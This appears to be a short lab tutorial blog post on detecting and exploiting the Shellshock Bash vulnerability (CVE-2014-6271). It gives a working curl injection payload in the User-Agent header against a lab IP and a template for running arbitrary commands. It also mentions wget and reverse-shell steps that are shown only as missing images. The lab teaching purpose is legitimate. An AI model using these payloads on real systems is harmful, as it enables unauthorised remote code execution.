Post

Shellshock.

Shellshock Tutorial; Detection and Exploitation...

Shellshock.

Shellshock is a security vulnerability in the Bash shell, discovered in 2014, that allows attackers to execute arbitrary commands on a vulnerable system. It exploits the way Bash handles environment variables and functions. By injecting malicious code into these variables, an attacker can gain control of the system, execute commands, or bypass security restrictions, making it a serious risk for servers and devices running vulnerable versions of Bash.

The following examples can be reproduced in the next lab: Pentesterlab CVE-2014-6271/Shellshock

Detection.

Shellshock can be exploited regularly in .sh or .cgi files, we can add those extensions to search them in our fuzzing.

Sublime's custom image Sublime's custom image Sublime's custom image


Shellshock payloads allways begin with: () { :;};.

curl.


Once we think we have found this vulnerability we can send the next curl to the server and check if it answers back. If it does we are against a shellshock vulnerability.

1
curl -H ‘User-Agent: () { :;}; echo; echo ¿Es vulnerable?’ ‘http://10.10.10.56/cgi-bin/user.sh’

3

We can use Burpsuite too.

4

RCE.

Once we know are facing Shellshock we can try to excute commands in the target. To de so we will deploy our commands as follows:

1
User-Agent: () { :;}; /bin/bash -c "<COMMAND>"

ping

5

wget

6

Reverse Shell.

7 8

Any of the headers of the request can be used to deploy our payload as you can see in the following pictures: 10 11

This post is licensed under CC BY 4.0 by the author.